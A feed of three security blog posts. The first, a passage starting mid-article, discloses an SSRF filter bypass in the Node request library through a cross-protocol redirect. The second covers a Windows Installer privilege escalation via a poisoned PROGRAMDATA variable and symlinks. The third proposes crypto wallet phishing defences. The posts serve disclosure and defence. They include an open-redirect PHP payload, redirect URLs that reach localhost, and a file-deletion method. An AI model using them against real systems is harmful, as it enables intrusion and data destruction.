Client’s code was a simple endpoint created for integration. During the original engagement there was no filtering at all. After our test the client has applied an anti-SSRF library ssrfFilter. For the research and code anonymity purposes, I have extracted the logic to a standalone NodeJS script:

const request = require('request');
const ssrfFilter = require('ssrf-req-filter');

let url = process.argv[2];
console.log("Testing", url);

request({
    uri: url,
    agent: ssrfFilter(url),
}, function (error, response, body) {
    console.error('error:', error);
    console.log('statusCode:', response && response.statusCode);
});

To verify a redirect bypasss I have created a simple webserver with an open-redirect endpoint in PHP and hosted it on the Internet using my test domain tellico.fun:

<?php header('Location: '.$_GET["target"]); ?>

Initial test demonstrates that the vulnerability is fixed:

$ node test-request.js "http://tellico.fun/redirect.php?target=http://localhost/test" 
Testing http://tellico.fun/redirect.php?target=http://localhost/test
error: Error: Call to 127.0.0.1 is blocked.

But then, I switched the protocol and suddenly I was able to access a localhost service again. Readers should look carefully at the payload, as the difference is minimal:

$ node test-request.js "https://tellico.fun/redirect.php?target=http://localhost/test"
Testing https://tellico.fun/redirect.php?target=http://localhost/test
error: null
statusCode: 200

What happened? The attacker server has redirected the request to another protocol - from HTTPS to HTTP. This is all it took to bypass the anti-SSRF protection.

Why is that? After some digging in the popular request library codebase, I have discovered the following lines in the lib/redirect.js file:

  // handle the case where we change protocol from https to http or vice versa
if (request.uri.protocol !== uriPrev.protocol) {
  delete request.agent
}

According to the code above, anytime the redirect causes a protocol switch, the request agent is deleted. Without this workaround, the client would fail anytime a server would cause a cross-protocol redirect. This is needed since the native NodeJs http(s).agent cannot be used with both protocols.

Unfortunately, such behavior also loses any event handling associated with the agent. Given, that the SSRF prevention is based on the agents’ createConnection event handler, this unexpected behavior affects the effectiveness of SSRF mitigation strategies in the request library.

Disclosure

This issue was disclosed to the maintainers on December 5th, 2022. Despite our best attempts, we have not yet received an acknowledgment. After the 90-days mark, we have decided to publish the full technical details as well as a public Github issue linked to a pull request for the fix. On March 14th, 2023, a CVE ID has been assigned to this vulnerability.

  • 12/05/2022 - First disclosure to the maintainer
  • 01/18/2023 - Another attempt to contact the maintainer
  • 03/08/2023 - A Github issue creation, without the technical details
  • 03/13/2023 - CVE-2023-28155 assigned
  • 03/16/2023 - Full technical details disclosure

Other Libraries

Since supposedly universal filter turned out to be so dependent on the implementation of the HTTP(S) clients, it is natural to ask how other popular libraries handle these cases.

Node-Fetch

The node-Fetch library also allows to overwrite an HTTP(S) agent within its options, without specifying the protocol:

const ssrfFilter = require('ssrf-req-filter');
const fetch = (...args) => import('node-fetch').then(({ default: fetch }) => fetch(...args));

let url = process.argv[2];
console.log("Testing", url);

fetch(url, {
    agent: ssrfFilter(url)
}).then((response) => {
    console.log('Success');
}).catch(error => {
    console.log('${error.toString().split('\n')[0]}');
});

Contrary to the request library though, it simply fails in the case of a cross-protocol redirect:

$ node fetch.js "https://tellico.fun/redirect.php?target=http://localhost/test"
Testing https://tellico.fun/redirect.php?target=http://localhost/test
TypeError [ERR_INVALID_PROTOCOL]: Protocol "http:" not supported. Expected "https:"

It is therefore impossible to perform a similar attack on this library.

Axios

The axios library’s options allow to overwrite agents for both protocols separately. Therefore the following code is protected:

axios.get(url, {
    httpAgent: ssrfFilter("http://domain"),
    httpsAgent: ssrfFilter("https://domain")
})

Note: In Axios library, it is neccesary to hardcode the urls during the agent overwrite. Otherwise, one of the agents would be overwritten with an agent for a wrong protocol and the cross-protocol redirect would fail similarly to the node-fetch library.

Still, axios calls can be vulnerable. If one forgets to overwrite both agents, the cross-protocol redirect can bypass the filter:

axios.get(url, {
    // httpAgent: ssrfFilter(url),
    httpsAgent: ssrfFilter(url)
})

Such misconfigurations can be easily missed, so we have created a Semgrep rule that catches similar patterns in JavaScript code:

rules:
  - id: axios-only-one-agent-set
    message: Detected an Axios call that overwrites only one HTTP(S) agent. It can lead to a bypass of restriction implemented in the agent implementation. For example SSRF protection can be bypassed by a malicious server redirecting the client from HTTPS to HTTP (or the other way around).
    mode: taint
    pattern-sources:
      - patterns:
        - pattern-either:
            - pattern: |
                {..., httpsAgent:..., ...}
            - pattern: |
                {..., httpAgent:..., ...}
        - pattern-not: |
                {...,httpAgent:...,httpsAgent:...}
    pattern-sinks:
      - pattern: $AXIOS.request(...)
      - pattern: $AXIOS.get(...)
      - pattern: $AXIOS.delete(...)
      - pattern: $AXIOS.head(...)
      - pattern: $AXIOS.options(...)
      - pattern: $AXIOS.post(...)
      - pattern: $AXIOS.put(...)
      - pattern: $AXIOS.patch(...)
    languages:
      - javascript
      - typescript
    severity: WARNING

Summary

As discussed above, we have discovered an exploitable SSRF vulnerability in the popular request library. Despite the fact that this package has been deprecated, this dependency is still used by over 50k projects with over 18M downloads per week.

We demonstrated how an attacker can bypass any anti-SSRF mechanisms injected into this library by simply redirecting the request to another protocol (e.g. HTTP to HTTPS). While many libraries we reviewed did provide protection from such attacks, others such as axios could be potentially vulnerable when similar misconfigurations exist. In an effort to make these issues easier to find and avoid, we have also released our internal Semgrep rule.

Windows Installer EOP (CVE-2023-21800)

20 March 2023 at 23:00

TL;DR: This blog post describes the details and methodology of our research targeting the Windows Installer (MSI) installation technology. If you’re only interested in the vulnerability itself, then jump right there

Introduction

Recently, I decided to research a single common aspect of many popular Windows applications - their MSI installer packages.

Not every application is distributed this way. Some applications implement custom bootstrapping mechanisms, some are just meant to be dropped on the disk. However, in a typical enterprise environment, some form of control over the installed packages is often desired. Using the MSI packages simplifies the installation process for any number of systems and also provides additional benefits such as automatic repair, easy patching, and compatibility with GPO. A good example is Google Chrome, which is typically distributed as a standalone executable, but an enterprise package is offered on a dedicated domain.

Another interesting aspect of enterprise environments is a need for strict control over employee accounts. In particular, in a well-secured Windows environment, the rule of least privileges ensures no administrative rights are given unless there’s a really good reason. This is bad news for malware or malicious attackers who would benefit from having additional privileges at hand.

During my research, I wanted to take a look at the security of popular MSI packages and understand whether they could be used by an attacker for any malicious purposes and, in particular, to elevate local privileges.

Typical installation

It’s very common for the MSI package to require administrative rights. As a result, running a malicious installer is a straightforward game-over. I wanted to look at legitimate, properly signed MSI packages. Asking someone to type an admin password, then somehow opening elevated cmd is also an option that I chose not to address in this blog post.

Let’s quickly look at how the installer files are generated. Turns out, there are several options to generate an MSI package. Some of the most popular ones are WiX Toolset, InstallShield, and Advanced Installer. The first one is free and open-source, but requires you to write dedicated XML files. The other two offer various sets of features, rich GUI interfaces, and customer support, but require an additional license. One could look for generic vulnerabilities in those products, however, it’s really hard to address all possible variations of offered features. On the other hand, it’s exactly where the actual bugs in the installation process might be introduced.

During the installation process, new files will be created. Some existing files might also be renamed or deleted. The access rights to various securable objects may be changed. The interesting question is what would happen if unexpected access rights are present. Would the installer fail or would it attempt to edit the permission lists? Most installers will also modify Windows registry keys, drop some shortcuts here and there, and finally log certain actions in the event log, database, or plain files.

The list of actions isn’t really sealed. The MSI packages may implement the so-called custom actions which are implemented in a dedicated DLL. If this is the case, it’s very reasonable to look for interesting bugs over there.

Once we have an installer package ready and installed, we can often observe a new copy being cached in the C:\Windows\Installers directory. This is a hidden system directory where unprivileged users cannot write. The copies of the MSI packages are renamed to random names matching the following regular expression: ^[0-9a-z]{7}\.msi$. The name will be unique for every machine and even every new installation. To identify a specific package, we can look at file properties (but it’s up to the MSI creator to decide which properties are configured), search the Windows registry, or ask the WMI:

$ Get-WmiObject -class Win32_Product | ? { $_.Name -like "*Chrome*" } | select IdentifyingNumber,Name

IdentifyingNumber                      Name
-----------------                      ----
{B460110D-ACBF-34F1-883C-CC985072AF9E} Google Chrome

Referring to the package via its GUID is our safest bet. However, different versions of the same product may still have different identifiers.

Assuming we’re using an unprivileged user account, is there anything interesting we can do with that knowledge?

Repair process

The builtin Windows tool, called msiexec.exe, is located in the System32 and SysWOW64 directories. It is used to manage the MSI packages. The tool is a core component of Windows with a long history of vulnerabilities. As a side note, I also happen to have found one such issue in the past (CVE-2021-26415). The documented list of its options can be found on the MSDN page although some additional undocumented switches are also implemented.

The flags worth highlighting are:

  • /l*vx to log any additional details and search for interesting events
  • /qn to hide any UI interactions. This is extremely useful when attempting to develop an automated exploit. On the other hand, potential errors will result in new message boxes. Until the message is accepted, the process does not continue and can be frozen in an unexpected state. We might be able to modify some existing files before the original access rights are reintroduced.

The repair options section lists flags we could use to trigger the repair actions. These actions would ensure the bad files are removed, and good files are reinstalled instead. The definition of bad is something we control, i.e., we can force the reinstallation of all files, all registry entries, or, say, only those with an invalid checksum.

Parameter Description
/fp Repairs the package if a file is missing.
/fo Repairs the package if a file is missing, or if an older version is installed.
/fe Repairs the package if file is missing, or if an equal or older version is installed.
/fd Repairs the package if file is missing, or if a different version is installed.
/fc Repairs the package if file is missing, or if checksum does not match the calculated value.
/fa Forces all files to be reinstalled.
/fu Repairs all the required user-specific registry entries.
/fm Repairs all the required computer-specific registry entries.
/fs Repairs all existing shortcuts.
/fv Runs from source and re-caches the local package.

Most of the msiexec actions will require elevation. We cannot install or uninstall arbitrary packages (unless of course the system is badly misconfigured). However, the repair option might be an interesting exception! It might be, because not every package will work like this, but it’s not hard to find one that will. For these, the msiexec will auto-elevate to perform necessary actions as a SYSTEM user. Interestingly enough, some actions will be still performed using our unprivileged account making the case even more noteworthy.

The impersonation of our account will happen for various security reasons. Only some actions can be impersonated, though. If you’re seeing a file renamed by the SYSTEM user, it’s always going to be a fully privileged action. On the other hand, when analyzing who exactly writes to a given file, we need to look at how the file handle was opened in the first place.

We can use tools such as Process Monitor to observe all these events. To filter out the noise, I would recommend using the settings shown below. It’s possible to miss something interesting, e.g., a child processes’ actions, but it’s unrealistic to dig into every single event at once. Also, I’m intentionally disabling registry activity tracking, but occasionally it’s worth reenabling this to see if certain actions aren’t controlled by editable registry keys.

Procmon filter settings

Another trick I’d recommend is to highlight the distinction between impersonated and non-impersonated operations. I prefer to highlight anything that isn’t explicitly impersonated, but you may prefer to reverse the logic.

Procmon highlighting settings

Then, to start analyzing the events of the aforementioned Google Chrome installer, one could run the following command:

msiexec.exe /fa '{B460110D-ACBF-34F1-883C-CC985072AF9E}'

The stream of events should be captured by ProcMon but to look for issues, we need to understand what can be considered an issue. In short, any action on a securable object that we can somehow modify is interesting. SYSTEM writes a file we control? That’s our target.

Typically, we cannot directly control the affected path. However, we can replace the original file with a symlink. Regular symlinks are likely not available for unprivileged users, but we may use some tricks and tools to reinvent the functionality on Windows.

Windows EoP primitives

Although we’re not trying to pop a shell out of every located vulnerability, it’s interesting to educate the readers on what would be possible given some of the Elevation of Privilege primitives.

With an arbitrary file creation vulnerability we could attack the system by creating a DLL that one of the system processes would load. It’s slightly harder, but not impossible, to locate a Windows process that loads our planted DLL without rebooting the entire system.

Having an arbitrary file creation vulnerability but with no control over the content, our chances to pop a shell are drastically reduced. We can still make Windows inoperable, though.

With an arbitrary file delete vulnerability we can at least break the operating system. Often though, we can also turn this into an arbitrary folder delete and use the sophisticated method discovered by Abdelhamid Naceri to actually pop a shell.

The list of possible primitives is long and fascinating. A single EoP primitive should be treated as a serious security issue, nevertheless.

One vulnerability to rule them all (CVE-2023-21800)

I’ve observed the same interesting behavior in numerous tested MSI packages. The packages were created by different MSI creators using different types of resources and basically had nothing in common. Yet, they were all following the same pattern. Namely, the environment variables set by the unprivileged user were also used in the context of the SYSTEM user invoked by the repair operation.

Although I initially thought that the applications were incorrectly trusting some environment variables, it turned out that the Windows Installer’s rollback mechanism was responsible for the insecure actions.

7-zip

7-Zip provides dedicated Windows Installers which are published on the project page. The following file was tested:

Filename Version
7z2201-x64.msi 22.01

To better understand the problem, we can study the source code of the application. The installer, defined in the DOC/7zip.wxs file, refers to the ProgramMenuFolder identifier.

     <Directory Id="ProgramMenuFolder" Name="PMenu" LongName="Programs">
        <Directory Id="PMenu" Name="7zip" LongName="7-Zip" />
      </Directory>
      ...
     <Component Id="Help" Guid="$(var.CompHelp)">
        <File Id="_7zip.chm" Name="7-zip.chm" DiskId="1" >
            <Shortcut Id="startmenuHelpShortcut" Directory="PMenu" Name="7zipHelp" LongName="7-Zip Help" />
        </File>
     </Component>

The ProgramMenuFolder is later used to store some components, such as a shortcut to the 7-zip.chm file.

As stated on the MSDN page:

The installer sets the ProgramMenuFolder property to the full path of the Program Menu folder for the current user. If an “All Users” profile exists and the ALLUSERS property is set, then this property is set to the folder in the “All Users” profile.

In other words, the property will either point to the directory controlled by the current user (in %APPDATA% as in the previous example), or to the directory associated with the “All Users” profile.

While the first configuration does not require additional explanation, the second configuration is tricky. The C:\ProgramData\Microsoft\Windows\Start Menu\Programs path is typically used while C:\ProgramData is writable even by unprivileged users. The C:\ProgramData\Microsoft path is properly locked down. This leaves us with a secure default.

However, the user invoking the repair process may intentionally modify (i.e., poison) the PROGRAMDATA environment variable and thus redirect the “All Users” profile to the arbitrary location which is writable by the user. The setx command can be used for that. It modifies variables associated with the current user but it’s important to emphasize that only the future sessions are affected. A completely new cmd.exe instance should be started to inherit the new settings.

Instead of placing legitimate files, a symlink to an arbitrary file can be placed in the %PROGRAMDATA%\Microsoft\Windows\Start Menu\Programs\7-zip\ directory as one of the expected files. As a result, the repair operation will:

  • Remove the arbitrary file (using the SYSTEM privileges)
  • Attempt to restore the original file (using an unprivileged user account)

The second action will fail, resulting in an Arbitrary File Delete primitive. This can be observed on the following capture, assuming we’re targeting the previously created C:\Windows\System32\__doyensec.txt file. We intentionally created a symlink to the targeted file under the C:\FakeProgramData\Microsoft\Windows\Start Menu\Programs\7-zip\7-Zip Help.lnk path.

The operation result in REPARSE

Firstly, we can see the actions resulting in the REPARSE status. The file is briefly processed (or rather its attributes are), and the SetRenameInformationFile is called on it. The rename part is slightly misleading. What is actually happening is that file is moved to a different location. This is how the Windows installer creates rollback instructions in case something goes wrong. As stated before, the SetRenameInformationFile doesn’t work on the file handle level and cannot be impersonated. This action runs with the full SYSTEM privileges.

Later on, we can spot attempts to restore the original file, but using an impersonated token. These actions result in ACCESS DENIED errors, therefore the targeted file remains deleted.

The operation result in REPARSE

The same sequence was observed in numerous other installers. For instance, I worked with PuTTY’s maintainer on a possible workaround which was introduced in the 0.78 version. In that version, the elevated repair is allowed only if administrator credentials are provided. However, this isn’t functionally equal and has introduced some other issues. The 0.79 release should restore the old WiX configuration.

Redirection Guard

The issue was reported directly to Microsoft with all the above information and a dedicated exploit. Microsoft assigned CVE-2023-21800 identifier to it.

It was reproducible on the latest versions of Windows 10 and Windows 11. However, it was not bounty-eligible as the attack was already mitigated on the Windows 11 Developer Preview. The same mitigation has been enabled with the 2022-02-14 update.

In October 2022 Microsoft shipped a new feature called Redirection Guard on Windows 10 and Windows 11. The update introduced a new type of mitigation called ProcessRedirectionTrustPolicy and the corresponding PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY structure. If the mitigation is enabled for a given process, all processed junctions are additionally verified. The verification first checks if the filesystem junction was created by non-admin users and, if so, if the policy prevents following them. If the operation is prevented, the error 0xC00004BC is returned. The junctions created by admin users are explicitly allowed as having a higher trust-level label.

In the initial round, Redirection Guard was enabled for the print service. The 2022-02-14 update enabled the same mitigation on the msiexec process.

This can be observed in the following ProcMon capture:

The 0xC00004BC error returned by the new mitigation

The msiexec is one of a few applications that have this mitigation enforced by default. To check for yourself, use the following not-so-great code:

#include <windows.h>
#include <TlHelp32.h>
#include <cstdio>
#include <string>
#include <vector>
#include <memory>

using AutoHandle = std::unique_ptr<std::remove_pointer_t<HANDLE>, decltype(&CloseHandle)>;
using Proc = std::pair<std::wstring, AutoHandle>;

std::vector<Proc> getRunningProcesses() {
    std::vector<Proc> processes;

    std::unique_ptr<std::remove_pointer_t<HANDLE>, decltype(&CloseHandle)> snapshot(CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0), &CloseHandle);

    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);
    Process32First(snapshot.get(), &pe32);

    do {
        auto h = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pe32.th32ProcessID);
        if (h) {
            processes.emplace_back(std::wstring(pe32.szExeFile), AutoHandle(h, &CloseHandle));
        }
    } while (Process32Next(snapshot.get(), &pe32));

    return processes;
}

int main() {
    auto runningProcesses = getRunningProcesses();

    PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY policy;

    for (auto& process : runningProcesses) {
        auto result = GetProcessMitigationPolicy(process.second.get(), ProcessRedirectionTrustPolicy, &policy, sizeof(policy));

        if (result && (policy.AuditRedirectionTrust | policy.EnforceRedirectionTrust | policy.Flags)) {
            printf("%ws:\n", process.first.c_str());
            printf("\tAuditRedirectionTrust: % d\n\tEnforceRedirectionTrust : % d\n\tFlags : % d\n", policy.AuditRedirectionTrust, policy.EnforceRedirectionTrust, policy.Flags);
        }
    }
}

The Redirection Guard should prevent an entire class of junction attacks and might significantly complicate local privilege escalation attacks. While it addresses the previously mentioned issue, it also addresses other types of installer bugs, such as when a privileged installer moves files from user-controlled directories.

Microsoft Disclosure Timeline

Status Data
Vulnerability reported to Microsoft 9 Oct 2022
Vulnerability accepted 4 Nov 2022
Patch developed 10 Jan 2023
Patch released 14 Feb 2023

The Case For Improving Crypto Wallet Security

27 March 2023 at 22:00

Anatomy Of A Modern Day Crypto Scam

A large number of today’s crypto scams involve some sort of phishing attack, where the user is tricked into visiting a shady/malicious web site and connecting their wallet to it. The main goal is to trick the user into signing a transaction which will ultimately give the attacker control over the user’s tokens.

Usually, it all starts with a tweet or a post on some Telegram group or Slack channel, where a link is sent advertising either a new yield farming protocol boasting large APYs, or a new NFT project which just started minting. In order to interact with the web site, the user would need to connect their wallet and perform some confirmation or authorization steps.

Let’s take a look at the common NFT approve scam. The user is lead to the malicious NFT site, advertising a limited pre-mint of their new NFT collection. The user is then prompted to connect their wallet and sign a transaction, confirming the mint. However, for some reason, the transaction fails. The same happens on the next attempt. With each failed attempt, the user becomes more and more frustrated, believing the issue causes them to miss out on the mint. Their concentration and focus shifts slightly from paying attention to the transactions, to missing out on a great opportunity.

At this point, the phishing is in full swing. A few more failed attempts, and the victim bites.

Wallet Phishing

(Image borrowed from How scammers manipulate Smart Contracts to steal and how to avoid it)

The final transaction, instead of the mint function, calls the setApprovalForAll, which essentially will give the malicious actor control over the user’s tokens. The user by this point is in a state where they blindly confirm transactions, hoping that the minting will not close.

Unfortunately, the last transaction is the one that goes through. Game over for the victim. All the attacker has to do now is act quickly and transfer the tokens away from the user’s wallet before the victim realizes what happened.

These type of attacks are really common today. A user stumbles on a link to a project offering new opportunities for profits, they connect their wallet, and mistakenly hand over their tokens to malicious actors. While a case can be made for user education, responsibility, and researching a project before interacting with it, we believe that software also has a big part to play.

The Case For Improving Crypto Wallet Security

Nobody can deny that the introduction of both blockchain-based technologies and Web3 have had a massive impact on the world. A lot of them have offered the following common set of features:

  • transfer of funds
  • permission-less currency exchange
  • decentralized governance
  • digital collectibles

Regardless of the tech-stack used to build these platforms, it’s ultimately the users who make the platform. This means that users need a way to interact with their platform of choice. Today, the most user-friendly way of interacting with blockchain-based platforms is by using a crypto wallet. In simple terms, a crypto wallet is a piece of software which facilitates signing of blockchain transactions using the user’s private key. There are multiple types of wallets including software, hardware, custodial, and non-custodial. For the purposes of this post, we will focus on software based wallets.

Before continuing, let’s take a short detour to Web2. In that world, we can say that platforms (also called services, portals or servers) are primarily built using TCP/IP based technologies. In order for users to be able to interact with them, they use a user-agent, also known as a web browser. With that said, we can make the following parallel to Web3:

Technology Communication Protocol User-Agent
Web2 HTTP/TLS Web Browser
Web3 Blockchain JSON RPC Crypto Wallet

Web browsers are arguably much, much more complex pieces of software compared to crypto wallets - and with good reason. As the Internet developed, people figured out how to put different media on it and web pages allowed for dynamic and scriptable content. Over time, advancements in HTML and CSS technologies changed what and how content could be shown on a single page. The Internet became a place where people went to socialize, find entertainment, and make purchases. Browsers needed to evolve, to support new technological advancements, which in turn increased complexity. As with all software, complexity is the enemy, and complexity is where bugs and vulnerabilities are born. Browsers needed to implement controls to help mitigate web-based vulnerabilities such as spoofing, XSS, and DNS rebinding while still helping to facilitate secure communication via encrypted TLS connections.

Next, lets see what a typical crypto wallet interaction for a normal user might look like.

The Current State Of Things In The Web3 World

Using a Web3 platform today usually means that a user is interacting with a web application (Dapp), which contains code to interact with the user’s wallet and smart contracts belonging to the platform. The steps in that communication flow generally look like:

1. Open the Dapp

In most cases, the user will navigate their web browser to a URL where the Dapp is hosted (ex. Uniswap). This will load the web page containing the Dapp’s code. Once loaded, the Dapp will try to connect to the user’s wallet.

Dapp and User Wallet

2. Authorizing The Dapp

A few of the protections implemented by crypto wallets include requiring authorization before being able to access the user’s accounts and requests for transactions to be signed. This was not the case before EIP-1102. However, implementing these features helped keep users anonymous, stop Dapp spam, and provide a way for the user to manage trusted and un-trusted Dapp domains.

Authorizing The Dapp 1

If all the previous steps were completed successfully, the user can start using the Dapp.

When the user decides to perform an action (make a transaction, buy an NFT, stake their tokens, etc.), the user’s wallet will display a popup, asking whether the user confirms the action. The transaction parameters are generated by the Dapp and forwarded to the wallet. If confirmed, the transaction will be signed and published to the blockchain, awaiting confirmation.

Authorizing The Dapp 2

Besides the authorization popup when initially connecting to the Dapp, the user is not shown much additional information about the application or the platform. This ultimately burdens the user with verifying the legitimacy and trustworthiness of the Dapp and, unfortunately, this requires some degree of technical knowledge often out-of-reach for the majority of common users. While doing your own research, a common mantra of the Web3 world, is recommended, one misstep can lead to significant loss of funds.

That being said, let’s now take another detour to Web2 world, and see what a similar interaction looks like.

How Does The Web2 World Handle Similar Situations?

Like the previous example, we’ll look at what happens when a user wants to use a Web2 application. Let’s say that the user wants to check their email inbox. They’ll start by navigating their browser to the email domain (ex. Gmail). In the background, the browser performs a TLS handshake, trying to establish a secure connection to Gmail’s servers. This will enable an encrypted channel between the user’s browser and Gmail’s servers, eliminating the possibility of any eavesdropping. If the handshake is successful, an encrypted connection is established and communicated to the user through the browser’s UI.

Browser Lock

The secure connection is based on certificates issued for the domain the user is trying to access. A certificate contains a public key used to establish the encrypted connection. Additionally, certificates must be signed by a trusted third-party called a Certificate Authority (CA), giving the issued certificate legitimacy and guaranteeing that it belongs to the domain being accessed.

But, what happens if that is not the case? What happens when the certificate is for some reason rejected by the browser? Well, in that case a massive red warning is shown, explaining what happened to the user.

Browser Certificate Error

Such warnings will be shown when a secure connection could not be established, the certificate of the host is not trusted or if the certificate is expired. The browser also tries to show, in a human-readable manner, as much useful information about the error as possible. At this point, it’s the choice of the user whether they trust the site and want to continue interacting with it. The task of the browser is to inform the user of potential issues.

What Can Be Done?

Crypto wallets should show the user as much information about the action being performed as possible. The user should see information about the domain/Dapp they are interacting with. Details about the actual transaction’s content, such as what function is being invoked and its parameters should be displayed in a user-readable fashion.

Comparing both previous examples, we can notice a lack of verification and information being displayed in crypto wallets today. This, then poses the question: what can be done? There exist a number of publicly available indicators for the health and legitimacy of a project. We believe communicating these to the user may be a good step forward in addressing this issue. Let’s go quickly go through them.

Proof Of Smart Contract Ownership

It is important to prove that a domain has ownership over the smart contracts with which it interacts. Currently, this mechanism doesn’t seem to exist. However, we think we have a good solution. Similarly to how Apple performs merchant domain verification, a simple JSON file or dapp_file can be used to verify ownership. The file can be stored on the root of the Dapp’s domain, on the path .well-known/dapp_file. The JSON file can contain the following information:

  • address of the smart contract the Dapp is interacting with
  • timestamp showing when the file was generated
  • signature of the content, verifying the validity of the file

At this point, a reader might say: “How does this show ownership of the contract?”. The key to that is the signature. Namely, the signature is generated by using the private key of the account which deployed the contract. The transparency of the blockchain can be used to get the deployer address, which can then be used to verify the signature (similarly to how Ethereum smart contracts verify signatures on-chain).

This mechanism enables creating an explicit association between a smart contract and the Dapp. The association can later be used to perform additional verification.

Domain Registration Records

When a new domain is purchased or registered, a public record is created in a public registrar, indicating the domain is owned by someone and is no longer available for purchase. The domain name is used by the Domain Name Service, or DNS, which translates it (ex www.doyensec.com) to a machine-friendly IP address (ex. 34.210.62.107).

The creation date of a DNS record shows when the Dapp’s domain was initially purchased. So, if a user is trying to interact with an already long established project and runs into a domain which claims to be that project with a recently created domain registration record, it may be a signal of possible fraudulent activities.

TLS Certificates

Creation and expiration dates of TLS certificates can be viewed in a similar fashion as DNS records. However, due to the short duration of certificates issued by services such as Let’s Encrypt, there is a strong chance that visitors of the Dapp will be shown a relatively new certificate.

TLS certificates, however, can be viewed as a way of verifying a correct web site setup where the owner took additional steps to allow secure communication between the user and their application.

Smart Contract Source Code Verification Status

Published and verified source code allows for audits of the smart contract’s functionality and can allow quick identification of malicious activity.

Smart Contract Deployment Date

The smart contract’s deployment date can provide additional information about the project. For example, if attackers set up a fake Uniswap web site, the likelihood of the malicious smart contract being recently deployed is high. If interacting with an already established, legitimate project, such a discrepancy should alarm the user of potential malicious activity.

Smart Contract Interactions

Trustworthiness of a project can be seen as a function of the number of interactions with that project’s smart contracts. A healthy project, with a large user base will likely have a large number of unique interactions with the project’s contracts. A small number of interactions, unique or not, suggest the opposite. While typical of a new project, it can also be an indicator of smart contracts set up to impersonate a legitimate project. Such smart contracts will not have the large user base of the original project, and thus the number of interactions with the project will be low.

Overall, a large number of unique interactions over a long period of time with a smart contract may be a powerful indicator of a project’s health and the health of its ecosystem.

Our Suggestion

While there are authorization steps implemented when a wallet is connecting to an unknown domain, we think there is space for improvement. The connection and transaction signing process can be further updated to show user-readable information about the domain/Dapp being accessed.

As a proof-of-concept, we implemented a simple web service https://github.com/doyensec/wallet-info. The service utilizes public information, such as domain registration records, TLS certificate information and data available via Etherscan’s API. The data is retrieved, validated, parsed and returned to the caller.

The service provides access to the following endpoints:

  • /host?url=<url>
  • /contract?address=<address>

The data these endpoints return can be integrated in crypto wallets at two points in the user’s interaction.

Initial Dapp Access

The /host endpoint can be used when the user is initially connecting to a Dapp. The Dapp’s URL should be passed as a parameter to the endpoint. The service will use the supplied URL to gather information about the web site and its configuration. Additionally, the service will check for the presence of the dapp_file on the site’s root and verify its signature. Once processing is finished, the service will respond with:

{
  
  "name": "Example Dapp",
  "timestamp": "2000-01-01T00:00:00Z",
  "domain": "app.example.com",
  "tls": true,
  "tls_issued_on": "2022-01-01T00:00:00Z",
  "tls_expires_on": "2022-01-01TT00:00:00Z",
  "dns_record_created": "2012-01-01T00:00:00Z",
  "dns_record_updated": "2022-08-14T00:01:31Z",
  "dns_record_expires": "2023-08-13T00:00:00Z",
  "dapp_file": true,
  "valid_signature": true
}

This information can be shown to the user in a dialog UI element, such as:

Wallet Dialog Safe

As a concrete example, lets take a look at this fake Uniswap site was active during the writing of this post. If a user tried to connect their wallet to the Dapp running on the site, the following information would be returned to the user:

{
  
  "name": null,
  "timestamp": null,
  "domain": "apply-uniswap.com",
  "tls": true,
  "tls_issued_on": "2023-02-06T22:37:19Z",
  "tls_expires_on": "2023-05-07T22:37:18Z",
  "dns_record_created": "2023-02-06T23:31:09Z",
  "dns_record_updated": "2023-02-06T23:31:10Z",
  "dns_record_expires": "2024-02-06T23:31:09Z",
  "dapp_file": false,
  "valid_signature": false
}

The missing information from the response reflect that the dapp_file was not found on this domain. This information will then be reflected on the UI, informing the user of potential issues with the Dapp:

Wallet Dialog Domain Unsafe

At this point, the users can review the information and decide whether they feel comfortable giving the Dapp access to their wallet. Once the Dapp is authorized, this information doesn’t need to be shown anymore. Though, it would be beneficial to occasionally re-display this information, so that any changes in the Dapp or its domain will be communicated to the user.

Making A Transaction

Transactions can be split in two groups: transactions that transfer native tokens and transactions which are smart contract function calls. Based on the type of transaction being performed, the /contract endpoint can be used to retrieve information about the recipient of the transferred assets.

For our case, the smart contract function calls are the more interesting group of transactions. The wallet can retrieve information about both the smart contract on which the function will be called as well as the function parameter representing the recipient. For example the spender parameter in the approve(address spender, uint256 amount) function call. This information can be retrieved on a case-by-case basis, depending on the function call being performed.

Signatures of widely used functions are available and can be implemented in the wallet as a type of an allow or safe list. If a signature is unknown, the user should be informed about it.

Verifying the recipient gives users confidence they are transferring tokens, or allowing access to their tokens for known, legitimate addresses.

An example response for a given address will look something like:

{
  "is_contract": true,
  "contract_address": "0xF4134146AF2d511Dd5EA8cDB1C4AC88C57D60404",
  "contract_deployer": "0x002362c343061fef2b99d1a8f7c6aeafe54061af",
  "contract_deployed_on": "2023-01-01T00:00:00Z",
  "contract_tx_count": 10,
  "contract_unique_tx": 5,
  "valid_signature": true,
  "verified_source": false
}

In the background, the web service will gather information about the type of address (EOA or smart contract), code verification status, address interaction information etc. All of that should be shown to the user as part of the transaction confirmation step.

Wallet Dialog  Unsafe

Links to the smart contract and any additional information can be provided here, helping users perform additional verification if they so wish.

In the case of native token transfers, the majority of verification consists of typing in the valid to address. This is not a task that is well suited for automatic verification. For this use case, wallets provide an “address book” like functionality, which should be utilized to minimize any user errors when initializing a transaction.

Conclusion

The point of this post is to highlight the shortcomings of today’s crypto wallet implementations, to present ideas, and make suggestions for how they can be improved. This field is actively being worked on. Recently, MetaMask updated their confirmation UI to display additional information, informing users of potential setApprovalForAll scams. This is a step in the right direction, but there is still a long way to go. Features like these can be built upon and augmented, to a point where users can make transactions and know, to a high level of certainty, that they are not making a mistake or being scammed.

There are also third-party groups like WalletGuard and ZenGo who have implemented similar verifications described in this post. These features should be a standard and required for every crypto wallet, and not just an additional piece of software that needs to be installed.

Like the user-agent of Web2, the web browser, user-agents of Web3 should do as much as possible to inform and protect their users.

Our implementation of the wallet-info web service is just an example of how public information can be pooled together. That information, combined with a good UI/UX design, will greatly improve the security of crypto wallets and, in turn, the security of the entire Web3 ecosystem.

Does Dapp verification completely solve the phishing/scam problem? Unfortunately, the answer is no. The proposed changes can help users in distinguishing between legitimate projects and potential scams, and guide them to make the right decision. Dedicated attackers, given enough time and funds, will always be able to produce a smart contract, Dapp or web site, which will look harmless using the indicators described above. This is true for both the Web2 and Web3 world.

Ultimately, it is up to the user to decide if the they feel comfortable giving their login credentials to a web site, or access to their crypto wallet to a Dapp. All software can do is point them in the right direction.

